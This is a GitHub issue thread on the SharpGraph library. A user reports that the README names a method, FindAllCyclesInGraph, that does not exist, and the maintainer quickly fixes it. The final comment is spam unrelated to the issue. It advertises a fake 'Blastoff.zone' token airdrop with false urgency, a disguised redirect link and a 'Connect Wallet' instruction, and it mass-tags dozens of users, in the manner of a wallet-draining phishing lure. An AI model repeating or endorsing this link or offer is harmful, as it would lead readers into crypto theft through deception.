### ISSUE TITLE
FindAllCyclesInGraph not found

### ISSUE THREAD

**Issue by ctrl-alt-d** [jonghough/SharpGraph#1]
On readme I found:

https://github.com/jonghough/SharpGraph/blob/3fbaa708c31bb34bbfb5247beea5c4bc72e05394/README.md?plain=1#L124

But it looks that this method doesn't exist. Mai be should be `FindSimpleCycles`?

**Comment by jonghough** [comment]
Thank you for noticing this! I will fix it as soon as possible.

**Comment by jonghough** [comment]
fixed. thanks.

**Comment by ctrl-alt-d** [comment]
Wow. So fast. Good work. Kudos.

**Comment by masa2el** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
rucijiandan, @CiceroScotti, @gbrennon, @gat786, @billykwok, @hakeemullahjan, @gabriele-del-monte, @sitdownkevin, @alset-dev, @Qdigital, @0NPNM0, @mikeyhodl, @andy191x, @0xJuancito, @moneyyear2020, @newyorkthink, @wrong1man, @jwma, @dbarobin, @vishwas37, @Sed-iq, @ChristianGuerreiro, @stechu, @Pencab, @jlsgo, @RSivakov, @dovakinlink, @giorgionetg, @uabarahona, @bernardoduarte, @aviral17, @WaS-Studio, @trotelalexandre, @k-ool, @Int3rPlanetary, @CharlesCreativeContent, @jonghough, @sadozh, @eddieyg, @lichongbing, @Xarlizard, @shys, @wikicrafter, @s7v7nislands, @zzir, @AJAYK-01, @saharyy, @kreemdaada, @loreBianchi, @JeetSapovadiya
